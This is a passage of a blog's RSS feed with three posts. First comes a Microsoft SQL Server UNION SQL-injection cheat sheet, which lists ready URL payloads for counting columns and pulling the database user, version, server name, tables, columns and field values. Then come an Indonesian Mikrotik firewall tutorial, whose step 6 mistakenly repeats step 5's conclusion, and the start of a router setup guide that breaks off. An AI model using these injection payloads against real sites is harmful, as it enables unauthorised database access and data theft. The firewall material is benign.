		<link>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-union-exploit/</link>
		<comments>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-union-exploit/#comments</comments>
		<pubDate>Fri, 30 Dec 2011 17:17:10 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=190</guid>
		<description><![CDATA[UNION SQL INJECTION &#8211; DETECTION Integer Injection: http://[site]/page.asp?id=1 UNION SELECT ALL 1&#8211;All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. http://[site]/page.asp?id=1 UNION SELECT ALL 1,2&#8211; All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. http://[site]/page.asp?id=1 UNION [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=190&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<table id="AutoNumber1" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; DETECTION</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Integer Injection:</span></strong><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;"> UNION SELECT ALL </span><span style="color:#ff3300;">1&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.</span></p>
<p><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;"> UNION SELECT ALL </span><span style="color:#ff3300;">1,2&#8211;</span></span></p>
<p><span style="font-family:Tahoma;font-size:xx-small;">All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.</span></p>
<p><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;"> UNION SELECT ALL </span><span style="color:#ff3300;">1,2,3&#8211;</span></span></p>
<p><span style="font-family:Tahoma;font-size:xx-small;">All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.</span></p>
<p><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;"> UNION SELECT ALL </span><span style="color:#ff3300;">1,2,3,4&#8211;</span></span></p>
<p><span style="color:#ff3300;font-family:Tahoma;font-size:xx-small;">NO ERROR</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<p><strong></strong></p>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT DATABASE USER</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 UNION SELECT ALL 1,</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">,3,4&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">DB USER</span>]</span></td>
</tr>
</tbody>
</table>
<p><strong></strong></div>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT DATABASE NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 UNION SELECT ALL 1,</span><span style="color:#ff3300;">DB_NAME</span><span style="color:#fdb910;">,3,4&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">DB NAME</span>]</span></p>
<p>&nbsp;</td>
</tr>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT DATABASE VERSION</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 UNION SELECT ALL 1,</span><span style="color:#ff3300;">@@VERSION</span><span style="color:#fdb910;">,3,4&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">DB VERSION</span>]</span></p>
<p>&nbsp;</td>
</tr>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT SERVER NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 UNION SELECT ALL 1,</span><span style="color:#ff3300;">@@SERVERNAME</span><span style="color:#fdb910;">,3,4&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">SERVER NAME</span>]</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<p><strong></strong></div>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT DATABASE TABLES</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  UNION SELECT ALL 1,</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#ff3300;">name</span>,3,4 <span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span>&#8211;</span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">TABLE NAME 1</span>]</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT TABLE COLUMN NAMES</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  UNION SELECT ALL 1,</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;">column_name,3,4 <span style="color:#fdb910;">from </span><span style="color:#a8a8a8;">DBNAME</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">&#8216;</span>&#8211;</span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">COLUMN NAME  1</span>]</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT 1st FIELD</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  UNION SELECT ALL 1,</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">COLUMN-NAME-1</span>,3,4 <span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span>&#8211;</span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">FIELD 1 VALUE</span>]</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT 2nd FIELD</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;">1  UNION SELECT ALL 1,<span style="color:#a8a8a8;">COLUMN-NAME-2</span>,3,4 <span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span>&#8211; </span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">FIELD 2 VALUE</span>]</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">UNION SQL INJECTION &#8211; EXTRACT 3nd FIELD</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;">1  UNION SELECT ALL 1,<span style="color:#a8a8a8;">COLUMN-NAME-3</span>,3,4 <span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span>&#8211;</span><span style="font-family:Tahoma;font-size:xx-small;">[<span style="color:#ff3300;">FIELD 3 VALUE</span>]</span></td>
</tr>
</tbody>
</table>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/190/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=190&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-union-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>
	</item>
		<item>
		<title>Membuat Mikrotik Firewall dengan Logika Simple Mode</title>
		<link>http://andiwijaya.wordpress.com/2011/12/23/membuat-mikrotik-firewall-dengan-logika-simple-mode/</link>
		<comments>http://andiwijaya.wordpress.com/2011/12/23/membuat-mikrotik-firewall-dengan-logika-simple-mode/#comments</comments>
		<pubDate>Fri, 23 Dec 2011 04:43:49 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[Mikrotik]]></category>
		<category><![CDATA[mikrotik]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=187</guid>
		<description><![CDATA[Penulis Artikel : Nathan Gusti Ryan Berikut ini saya sharing Step by Step membuat konfigurasi Firewall Mikrotik dengan cara yang simple dan logis sehingga bisa lebih mudah di pahami karena lebih “Manusiawi”… &#160; Kita awali dengan tampilan Mikrotik Winbox yang mana semua konfigurasi IP Address, Setting NAT, Setting IP Route dan Setting IP DNS sudah benar dan Mikrotik [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=187&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>Penulis Artikel : <a href="http://nathangustiryan.wordpress.com/">Nathan Gusti Ryan</a></strong></p>
<p>Berikut ini saya sharing<strong> Step by Step membuat konfigurasi Firewall Mikrotik</strong> dengan cara yang simple dan logis sehingga bisa lebih mudah di pahami karena lebih “<strong>Manusiawi”…</strong></p>
<p>&nbsp;</p>
<p>Kita awali dengan tampilan Mikrotik Winbox yang mana semua konfigurasi IP Address, Setting NAT, Setting IP Route dan Setting IP DNS sudah benar dan Mikrotik dapat berfungsi dengan baik.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-001.jpg"><img title="Mikrotik-Firewall-001" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-001.jpg?w=614" alt="" /></a></p>
<p><strong>1. Mem-block suatu IP Address Client agar tidak dapat mengakses internet.</strong></p>
<p>Buat sebuah Firewall Rule :</p>
<ul>
<li>Chain = Forward</li>
<li>Src Address = 192.168.10.10</li>
<li>Out Interface = WAN.</li>
</ul>
<ul>
<li>Action = Drop.</li>
</ul>
<p>Maka PC Client 192.168.10.10 tidak akan dapat mengakses internet.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-002.jpg"><img title="Mikrotik-Firewall-002" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-002.jpg?w=614" alt="" /></a></p>
<p><strong>2. Mem-block suatu MAC Address suatu Client agar tidak dapat mengakses internet.</strong></p>
<p>Buat sebuah Firewall Rule :</p>
<ul>
<li>Chain = Forward</li>
<li>Out Interface = WAN.</li>
</ul>
<ul>
<li>ADVANCED : Mac Address = <strong>00:1F:3C:66:E6:A6</strong></li>
</ul>
<ul>
<li>Action = Drop.</li>
</ul>
<p>Maka PC Client dengan MAC Addres : <strong> 00:1F:3C:66:E6:A6</strong> tidak akan dapat mengakses internet.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-004.jpg"><img title="Mikrotik-Firewall-004" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-004.jpg?w=614" alt="" /></a></p>
<p><strong>3. Mem-block suatu Websites agar tidak dapat diakses oleh PC Client kita. ( Contohnya : websites Playboy.com )<br />
</strong></p>
<p>Buat sebuah Firewall Rule :</p>
<ul>
<li>Chain = Forward.</li>
<li>Out Interface = WAN.</li>
</ul>
<ul>
<li>Dst Address = <strong>202.134.0.135</strong> ( bisa di lihat dengan ping ke websites <strong>playboy.com</strong> ).</li>
</ul>
<ul>
<li>Action = Drop.</li>
</ul>
<p>Maka PC Client tidak akan dapat mengakses websites <strong>playboy.com</strong>.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-005.jpg"><img title="Mikrotik-Firewall-005" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-005.jpg?w=614" alt="" /></a></p>
<p><strong>4. Mem-block sejumlah Client dengan Group Address List agar tidak dapat mengakses internet.</strong></p>
<p>Buat sebuah Firewall Rule :</p>
<ul>
<li>Buat Group di menu <strong>Firewall</strong> &gt; <strong>Address List</strong>. ( misalnya dengan nama <strong>LAN-BLOCKED</strong> ).</li>
<li>Chain = Forward.</li>
<li>Out Interface = WAN.</li>
</ul>
<ul>
<li>ADVANCED : Src Address List = <strong></strong><strong>LAN-BLOCKED.</strong></li>
</ul>
<ul>
<li>Action = Drop.</li>
</ul>
<p>Maka PC Client yang sudah terdaftar pada Group<strong> </strong><strong></strong><strong>LAN-BLOCKED</strong> tidak akan dapat mengakses internet.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-006.jpg"><img title="Mikrotik-Firewall-006" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-006.jpg?w=614" alt="" /></a></p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-007.jpg"><img title="Mikrotik-Firewall-007" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-007.jpg?w=614" alt="" /></a></p>
<p><strong>5. Mem-block suatu Websites yang memiliki sejumlah IP Public maupun sejumlah Websites yang di larang untuk diakses Client agar PC Client di jaringan kita  tidak dapat mengakses websites tersebut. (</strong>Contohnya : websites<strong> Facebook.com )<br />
</strong></p>
<p>Buat sebuah Firewall Rule :</p>
<ul>
<li>Buat Group di menu <strong>Firewall</strong> &gt; <strong>Address List</strong>. Misalnya dengan nama <strong>FACEBOOK</strong>. ( bisa di lihat dengan ping ke websites <strong>facebook.com</strong> )</li>
<li>Buat Group di menu <strong>Firewall</strong> &gt; <strong>Address List</strong>. ( misalnya dengan nama <strong>LAN-FILTERED</strong> ).</li>
</ul>
<ul>
<li>Chain = Forward.</li>
<li>Out Interface = WAN.</li>
</ul>
<ul>
<li>ADVANCED<strong> : Src Address List = </strong><strong></strong><strong>LAN-FILTERED</strong> .</li>
<li>ADVANCED<strong> : Dst Address List = </strong><strong></strong><strong></strong><strong>FACEBOOK</strong> .</li>
</ul>
<ul>
<li>Action = Drop.</li>
</ul>
<p>Maka PC Client yang ada dalam Group <strong></strong><strong></strong><strong>LAN-FILTERED </strong>tidak akan dapat mengakses websites dengan IP Address yang sudah kita register pada Group <strong></strong><strong></strong><strong></strong><strong></strong><strong>FACEBOOK</strong> ( sesuai IP Address yang ada di menu<strong> Address List </strong> ).</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-008.jpg"><img title="Mikrotik-Firewall-008" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-008.jpg?w=614" alt="" /></a></p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-009.jpg"><img title="Mikrotik-Firewall-009" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-009.jpg?w=614" alt="" /></a></p>
<p><strong>6. Mem-block / mem-BlackList sejumlah IP Address Public yang teridentifikasi menganggu Mikrotik kita. </strong><strong><br />
</strong></p>
<p>Buat sebuah Firewall Rule :</p>
<ul>
<li>Buat Group di menu <strong>Firewall</strong> &gt; <strong>Address List</strong>. Misalnya dengan nama <strong>BLACK-HACKER</strong>. ( bisa di lihat dengan mengakses menu <strong>LOG</strong> ).</li>
</ul>
<ul>
<li>Chain = Forward.</li>
<li>IN Interface = WAN.</li>
</ul>
<ul>
<li>ADVANCED<strong> : Src Address List = </strong><strong></strong><strong>BLACK-HACKER.</strong></li>
</ul>
<ul>
<li><strong></strong><strong></strong><strong></strong><strong></strong>Action = Drop.</li>
</ul>
<p>Maka PC Client yang ada dalam Group <strong></strong><strong></strong><strong>LAN-FILTERED </strong>tidak akan dapat mengakses websites dengan IP Address yang sudah kita register pada Group <strong></strong><strong></strong><strong></strong><strong></strong><strong>FACEBOOK</strong> ( sesuai IP Address yang ada di menu<strong> Address List </strong> ).</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-011.jpg"><img title="Mikrotik-Firewall-011" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-011.jpg?w=614" alt="" /></a></p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-012.jpg"><img title="Mikrotik-Firewall-012" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-012.jpg?w=614" alt="" /></a></p>
<p>7. Okey, kita sudah berhasil membuat sejumlah Filtering Firewall.</p>
<p><a href="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-010.jpg"><img title="Mikrotik-Firewall-010" src="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-010.jpg?w=614" alt="" /></a></p>
<p>Mudah sekali bukan???</p>
<p>Next Articles akan mengangkat artikel TIPS &amp; TRICK Firewalling seperti saat ini lebih lanjut.</p>
<p>Selamat mencoba…</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/187/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=187&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/12/23/membuat-mikrotik-firewall-dengan-logika-simple-mode/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-001.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-001</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-002.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-002</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-004.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-004</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-005.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-005</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-006.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-006</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-007.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-007</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-008.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-008</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-009.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-009</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-011.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-011</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-012.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-012</media:title>
		</media:content>

		<media:content url="http://thinkxfree.files.wordpress.com/2011/10/mikrotik-firewall-010.jpg?w=614" medium="image">
			<media:title type="html">Mikrotik-Firewall-010</media:title>
		</media:content>
	</item>
		<item>
		<title>Step by Step Installasi Router Mikrotik dgn ADSL Speedy</title>
		<link>http://andiwijaya.wordpress.com/2011/12/23/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/</link>
		<comments>http://andiwijaya.wordpress.com/2011/12/23/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/#comments</comments>
		<pubDate>Fri, 23 Dec 2011 04:35:32 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[Mikrotik]]></category>
		<category><![CDATA[mikrotik]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=183</guid>
		<description><![CDATA[Penulis Artikel : Nathan Gusti Ryan Mikrotik, sesuai dengan visinya yaitu ROUTING THE WORLD, saat ini benar-benar telah diakui sebagai Router yang sangat handal dan sangat lengkap fiturnya serta sangat mudah konfigurasinya. Namun tidak sedikit dari penguna Mikrotik ini menanggalkan Mikrotik dan kembali ke jaringan NATURAL, bukan karena Mikrotiknya yang tidak handal atau Mikrotiknya yang “Bego”. Melainkan SDM mereka [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=183&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>Penulis Artikel : </strong><a href="http://jamesbond.xp-solution.com/"><strong>Nathan Gusti Ryan</strong></a></p>
<p><strong>Mikrotik</strong>, sesuai dengan visinya yaitu <strong>ROUTING THE WORLD</strong>, saat ini benar-benar telah diakui sebagai Router yang sangat handal dan sangat lengkap fiturnya serta sangat mudah konfigurasinya. Namun tidak sedikit dari penguna Mikrotik ini menanggalkan Mikrotik dan kembali ke jaringan <strong>NATURAL</strong>, bukan karena Mikrotiknya yang tidak handal atau Mikrotiknya yang <strong>“Bego”</strong>. Melainkan SDM mereka sendiri yang masih kurang dalam memahami dan mendalami fungsi serta teknis konfigurasi Mikrotik itu sendiri. So… belajarlah agar anda lebih expert menguasai Mikrotik ini. Termasuk rekan-rekan yang ingin profesional di bidang <strong>IT Networking System</strong>, kerja di <strong>ISP </strong>maupun di <strong>Telco</strong>. Siapkan Skill anda dengan keahlian<strong>Mikrotik Administrator</strong> yang handal, bukan sekedar bisa tapi harus benar-benar Expert…</p>
<p>Karena itulah, berbekal pengalaman dalam mengunakan Mikrotik sejak tahun 2005 hingga 2010 inilah saya membuat<strong> Buku Materi Training Mikrotik Bandwith Manajemen dan Mikrotik VPN Server – Client</strong>, dalam kurun waktu 5 bulan ( November 2009 – Februari  2011 ) telah membuat <strong>&gt; 30 kelas</strong> Training dengan jumlah peserta <strong>&gt; 500 orang</strong> ( baik kelas<strong>Reguler </strong>/ umum maupun kelas Private / <strong>Inhouse Training</strong> ). Training ini bukan untuk Profit Oriented tapi bersifat sharing ilmu dan pengalaman bagi rekan-rekan sesama IT, Mahasiswa dan Komunitas.</p>
<p>Melakukan Installasi <strong>Mikrotik PC Router</strong> atau melakukan konfigurasi <strong>Mikrotik RouterBoard</strong>, bukanlah hal yang <strong>sulit </strong>( jika benar2 paham basic konsep &amp; teknisnya ) tapi juga bukanlah hal yang <strong>mudah </strong>( bagi anda newbie Mikrotik dan bagi anda yang asal / sembarangan setting tanpa benar2 memahami cara kerja Mikrotik dengan seksama ).</p>
<p>Mengunakan koneksi Speedy dengan Router  Mikrotik ada 2 macam cara, yaitu :</p>
<p>1. <strong>Modem ADSL di setting sebagai PPPoE</strong>, lalu username &amp; password Speedy di input pada Modem, sehingga setelah terkoneksi ke Speedy maka IP Public berada pada Modem ADSL ini. Pada option ini Mikrotik hanya berfungsi sebagai <strong>BANDWITH MANAJEMEN</strong> saja serta berbagai fitur lain, namun hanya untuk layanan LOKAL.</p>
